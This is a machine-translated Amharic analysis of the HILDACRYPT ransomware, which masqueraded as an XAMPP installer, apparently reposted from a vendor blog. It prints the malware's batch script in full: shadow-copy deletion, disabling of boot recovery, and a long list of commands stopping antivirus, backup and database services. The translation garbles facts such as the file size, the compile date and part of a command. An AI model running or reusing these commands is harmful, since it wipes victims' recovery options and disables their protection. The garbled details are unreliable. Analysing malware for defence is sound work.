🥇HILDACRYPT፡ አዲስ ራንሰምዌር የመጠባበቂያ ሲስተሞችን እና የጸረ-ቫይረስ መፍትሄዎችን ነካ ፕሮሆስተር

ሰላም ሀብር! አንዴ በድጋሚ፣ ከ Ransomware ምድብ ስላገኙት የቅርብ ጊዜዎቹ የማልዌር ስሪቶች እየተነጋገርን ነው። HILDACRYPT በነሀሴ 2019 የተገኘው የሂልዳ ቤተሰብ አባል ሶፍትዌሩን ለማሰራጨት በተጠቀመበት የNetflix ካርቱን ስም የተገኘ አዲስ ቤዛዌር ነው። ዛሬ ከዚህ የተሻሻለው የራንሰምዌር ቫይረስ ቴክኒካዊ ባህሪያት ጋር እየተተዋወቅን ነው።

በመጀመሪያው የ Hilda ransomware ስሪት፣ በዩቲዩብ ላይ ወደተለጠፈው አገናኝ ተጎታች የካርቱን ተከታታይ በቤዛው ደብዳቤ ውስጥ ተይዟል. HILDACRYPT እንደ ህጋዊ XAMPP ጫኝ፣ ለመጫን ቀላል የሆነ Apache ስርጭት ማሪያዲቢን፣ ፒኤችፒን እና ፐርልን ያካትታል። በተመሳሳይ ጊዜ, cryptolocker የተለየ የፋይል ስም አለው - xamp. በተጨማሪም የራንሰምዌር ፋይሉ የኤሌክትሮኒክ ፊርማ የለውም።

የማይንቀሳቀስ ትንተና

ራንሰምዌር ለኤምኤስ ዊንዶውስ በተፃፈ የPE32 .NET ፋይል ውስጥ ይገኛል። መጠኑ 135 ባይት ነው። ሁለቱም ዋናው የፕሮግራም ኮድ እና የተከላካይ ፕሮግራም ኮድ በ C # ውስጥ ተጽፈዋል። በተጠናቀረበት ቀን እና የሰዓት ማህተም መሰረት፣ ሁለትዮሽ የተፈጠረው በሴፕቴምበር 168፣ 14 ነው።

እንደ Detect It Easy ገለፃ፣ ራንሰምዌር የሚቀመጠው Confuser እና ConfuserExን በመጠቀም ነው፣ ነገር ግን እነዚህ አስጸያፊዎች እንደበፊቱ ተመሳሳይ ናቸው፣ ConfuserEx ብቻ የConfuser ተተኪ ነው፣ ስለዚህ የእነሱ ኮድ ፊርማ ተመሳሳይ ነው።

HILDACRYPT በእርግጥ በConfuserEx የታሸገ ነው።

SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

የጥቃት ቬክተር

ምናልባትም፣ ራንሰምዌር እንደ ህጋዊ የXAMPP ፕሮግራም በማስመሰል ከድር ፕሮግራሚንግ ድረ-ገጾች በአንዱ ላይ ተገኝቷል።

አጠቃላይ የኢንፌክሽን ሰንሰለት በ ውስጥ ሊታይ ይችላል app.ማንኛውም.አሂድ ማጠሪያ.

መደበቅ

የቤዛውዌር ገመዶች በተመሰጠረ መልኩ ተቀምጠዋል። ሲጀመር HILDACRYPT Base64 እና AES-256-CBCን በመጠቀም ዲክሪፕት ያደርጋቸዋል።

ቅንብር

በመጀመሪያ ደረጃ፣ ራንሰምዌር በ%AppDataRoaming% ውስጥ የGUID (አለምአቀፍ ልዩ መለያ) መለኪያ በዘፈቀደ የሚፈጠርበትን አቃፊ ይፈጥራል። የባት ፋይልን ወደዚህ ቦታ በማከል የራንሰምዌር ቫይረስ cmd.exe በመጠቀም ያስጀምረዋል።

cmd.exe /c JKfgkgj3hjgfhjka.bat እና ውጣ

ከዚያ የስርዓት ባህሪያትን ወይም አገልግሎቶችን ለማሰናከል የቡድን ስክሪፕት መተግበር ይጀምራል።

ስክሪፕቱ የጥላ ቅጂዎችን የሚያጠፉ፣ የ SQL አገልጋይን የሚያሰናክሉ ረጅም የትዕዛዝ ዝርዝር ይዟል፣ ምትኬ እና ጸረ-ቫይረስ መፍትሄዎች።

ለምሳሌ፣ Acronis Backup አገልግሎቶችን ለማቆም ሞክሯል አልተሳካም። በተጨማሪም, ከሚከተሉት አቅራቢዎች የመጠባበቂያ ስርዓቶችን እና የጸረ-ቫይረስ መፍትሄዎችን ያጠቃል-Veam, Sophos, Kaspersky, McAfee እና ሌሎች.

@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0

አንዴ ከላይ የተጠቀሱት አገልግሎቶች እና ሂደቶች ከተሰናከሉ ክሪፕቶሎከር ሁሉም አስፈላጊ አገልግሎቶች መቋረጣቸውን ለማረጋገጥ የተግባር ዝርዝር ትዕዛዙን በመጠቀም ስለ ሁሉም አሂድ ሂደቶች መረጃ ይሰበስባል።
የተግባር ዝርዝር v/fo csv

ይህ ትእዛዝ የአሂድ ሂደቶችን ዝርዝር ያሳያል, ክፍሎቹ በ "" ምልክት ተለያይተዋል.
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»

ከዚህ ቼክ በኋላ፣ ራንሰምዌር የማመስጠር ሂደቱን ይጀምራል።

ምስጠራ

የፋይል ምስጠራ

HILDACRYPT ከሪሳይክል.ቢን እና ከማጣቀሻ ስብሰባዎች የማይክሮሶፍት ማህደሮች በስተቀር በሁሉም የሃርድ ድራይቭ ይዘቶች ውስጥ ያልፋል። የኋለኛው ወሳኝ dll፣ pdb፣ ወዘተ ፋይሎችን ይዟል።የተጣራ አፕሊኬሽኖች የቤዛ ዌርን አሠራር ሊነኩ ይችላሉ። የተመሰጠሩ ፋይሎችን ለመፈለግ የሚከተለው የቅጥያዎች ዝርዝር ጥቅም ላይ ይውላል።

«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»

ራንሰምዌር የተጠቃሚ ፋይሎችን ለማመስጠር AES-256-CBC ስልተ ቀመር ይጠቀማል። የቁልፍ መጠኑ 256 ቢት ሲሆን የመነሻ ቬክተር (IV) መጠን 16 ባይት ነው።

በሚከተለው ቅጽበታዊ ገጽ እይታ የባይት_2 እና ባይት_1 እሴቶች የተገኙት GetBytes()ን በመጠቀም በዘፈቀደ ነው።

ቁልፍ

ውስጥ እና

ኢንክሪፕት የተደረገው ፋይል HCY ቅጥያ አለው!... ይህ የተመሰጠረ ፋይል ምሳሌ ነው። ከላይ የተጠቀሰው ቁልፍ እና IV የተፈጠሩት ለዚህ ፋይል ነው።

ቁልፍ ምስጠራ

ክሪፕቶሎከር የተፈጠረውን AES ቁልፍ በተመሰጠረ ፋይል ውስጥ ያከማቻል። የተመሰጠረው ፋይል የመጀመሪያ ክፍል እንደ HILDACRYPT፣ KEY፣ IV፣ FileLen በኤክስኤምኤል ቅርጸት ያሉ መረጃዎችን የያዘ ራስጌ አለው እና ይህን ይመስላል።

AES እና IV ቁልፍ ምስጠራ የሚከናወነው RSA-2048ን በመጠቀም ነው፣ እና ኢንኮዲንግ የሚደረገው Base64ን በመጠቀም ነው። የRSA የህዝብ ቁልፍ በኤክስኤምኤል ቅርጸት ከተመሰጠሩት ሕብረቁምፊዎች በአንዱ በክሪፕቶሎከር አካል ውስጥ ተከማችቷል።

28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB

የ RSA ህዝባዊ ቁልፍ የAES ፋይል ቁልፉን ለማመስጠር ስራ ላይ ይውላል። የ RSA የህዝብ ቁልፍ Base64 ኢንኮድ የተደረገ እና ሞጁል እና የህዝብ አርቢ 65537 ያካትታል። ዲክሪፕት ማድረግ አጥቂው ያለው RSA የግል ቁልፍ ያስፈልገዋል።

ከRSA ምስጠራ በኋላ የAES ቁልፉ ኢንክሪፕት በተደረገው ፋይል ውስጥ የተከማቸ Base64ን በመጠቀም ነው የተመሰጠረው።

የቤዛ መልእክት

ምስጠራው እንደተጠናቀቀ HILDACRYPT የኤችቲኤምኤል ፋይሉን ወደ ሚያመሰጥርበት አቃፊ ይጽፋል። የራንሰምዌር ማሳወቂያው ተጎጂው አጥቂውን ማግኘት የሚችልባቸው ሁለት የኢሜይል አድራሻዎችን ይዟል።

[ኢሜል የተጠበቀ]
[ኢሜል የተጠበቀ]

የዝርፊያው ማስታወቂያ “ሎሎ ደህንነቱ የተጠበቀ አይደለም፤)” የሚለውን መስመርም ይዟል - በጃፓን የታገዱ ትናንሽ ልጃገረዶች ገጽታ ያላቸው የአኒሜ እና የማንጋ ገፀ-ባህሪያት ማጣቀሻ።

መደምደሚያ

HILDACRYPT፣ አዲስ የቤዛ ዌር ቤተሰብ፣ አዲስ ስሪት አውጥቷል። የኢንክሪፕሽን ሞዴሉ ተጎጂው በራንሰምዌር የተመሰጠሩ ፋይሎችን እንዳይፈታ ይከላከላል። ክሪፕቶሎከር ከመጠባበቂያ ሲስተሞች እና ጸረ-ቫይረስ መፍትሄዎች ጋር የተያያዙ የጥበቃ አገልግሎቶችን ለማሰናከል ንቁ የመከላከያ ዘዴዎችን ይጠቀማል። የHILDACRYPT ደራሲ በኔትፍሊክስ ላይ የሚታየው የሂልዳ አኒሜሽን ተከታታይ አድናቂ ነው፣የፊልሙ ተጎታች አገናኝ ለቀደመው የፕሮግራሙ ስሪት የግዢ ደብዳቤ ውስጥ ይገኛል።

በመደበኛነት ፣ አክሮኒስ ምትኬ и አሲሮኒስ እውነተኛ ምስል ኮምፒውተርዎን ከHILDACRYPT ransomware ሊከላከል ይችላል፣ እና አቅራቢዎች ደንበኞቻቸውን ለመጠበቅ ችሎታ አላቸው። አክሮኒስ ምትኬ ደመና. ጥበቃው የተረጋገጠው እነዚህ መፍትሄዎች የሚያካትቱት እውነታ ነው የሳይበር ደህንነት ምትኬን ብቻ ሳይሆን የተቀናጀ የደህንነት ስርዓታችንንም ያካትታል አክሮኒስ ንቁ ጥበቃ - በማሽን መማሪያ ሞዴል የተጎላበተ እና በባህሪ ሂዩሪስቲክስ ላይ የተመሰረተ፣ የዜሮ-ቀን ራንሰምዌር ስጋትን እንደሌሎች መከላከል የሚችል ቴክኖሎጂ።

የስምምነት አመልካቾች

የፋይል ቅጥያ HCY!
HILDAACRYPTReadMe.html
xamp.exe በአንድ ፊደል "p" እና ምንም ዲጂታል ፊርማ የለም።
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

ምንጭ: hab.com

HILDACRYPT፡ አዲስ ራንሰምዌር የመጠባበቂያ ሲስተሞችን እና የጸረ-ቫይረስ መፍትሄዎችን ይመታል።